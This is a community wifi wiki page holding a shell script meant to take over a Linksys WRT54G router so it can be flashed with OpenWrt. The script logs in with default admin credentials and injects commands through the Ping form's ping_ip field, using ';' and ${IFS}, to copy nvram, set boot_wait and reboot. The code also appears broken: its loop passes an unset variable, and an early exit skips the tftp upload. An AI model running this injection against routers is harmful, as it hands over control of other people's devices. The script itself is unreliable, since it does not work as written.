Take over quinton

Un article de Toulouse Sans Fil, un réseau wifi libre sur Toulouse.

Accueil | Technique | LinksysWRT54g | Flasher un Wrt54g | autre script takeover 

#! /bin/sh

##############
## takeover ;-)
##############


set_wan_ip(){

		echo -n "setting WAN IP..."

		wget -q -O - --http-user=admin --http-passwd=admin --post-data='submit_button=index&change_action=&submit_type=&action=Apply&now_proto=static&daylight_time=1&lan_ipaddr=4&wan_proto=static&wan_ipaddr=4&wan_ipaddr_0=10&wan_ipaddr_1=0&wan_ipaddr_2=0&wan_ipaddr_3=1&wan_netmask=4&wan_netmask_0=255&wan_netmask_1=0&wan_netmask_2=0&wan_netmask_3=0&wan_gateway=4&wan_gateway_0=10&wan_gateway_1=0&wan_gateway_2=0&wan_gateway_3=254&wan_dns=3&wan_dns0_0=10&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=2&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=1&wan_mtu=1492&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&lan_proto=static&dhcp_check=&time_zone=%2B01+2+2&_daylight_time=1' http://192.168.1.1/apply.cgi 2> /dev/null | grep -i "settings are successful" > /dev/null

		[ $? != 0 ] && {
				echo -e '\nsetting WAN-IP error !'
				exit 1
		}
		echo "OK"
}

ping_hack(){
	data=`./url-encode.php $1`

	echo -n '.'
	
	POST_DATA='submit_button=Ping&submit_type=start&action=Apply&change_action=gozila_cgi&ping_ip='"$data"'&ping_times=5'

	wget -q -O /dev/null --http-user=admin --http-passwd=admin --post-data="$POST_DATA" http://192.168.1.1/apply.cgi
		[ $? != 0 ] && {
				echo -e '\n error in command !'
				exit 1
		}
		echo -n "."
}

pre_hack(){
	ping_hack ';true'
	ping_hack ';cp${IFS}*/*/nvram${IFS}/tmp/n'
}

reboot(){
	ping_hack ';/sbin/reboot'
	echo "done"
	
}


ap=$1

set_wan_ip
pre_hack


		echo -n "activation bootwait, reconfigure and reboot"

		for PING_IP in \
		';*/n${IFS}set${IFS}boot_wait=on' \
		';*/n${IFS}set${IFS}rc-reconfigure=on' \
		";*/n${IFS}set${IFS}rc-ap=$ap" \
		';*/n${IFS}commit' \
		';/sbin/reboot'
		do
			ping_hack  $DATA
		done
		echo "OK"


echo "firmware hacked OK ... you can safely flash your firmware ; your ap is rebooting again ..."

exit 0

tftp 192.168.1.1 <<EOF
binary
rexmt 1
put openwrt-g-code.bin
quit
EOF > /dev/null 2>&1

[ $? != 0 ] && {
	echo -e '\nFehler beim Upload der eigenen Firmware!'
	exit 1
}
echo "OK"

echo "Update erfolgreich abgeschlossen, die eigene Firmware wurde aufgespielt. :-)"
Récupérée de "http://www.toulouse-sans-fil.net/wiki/Take_over_quinton"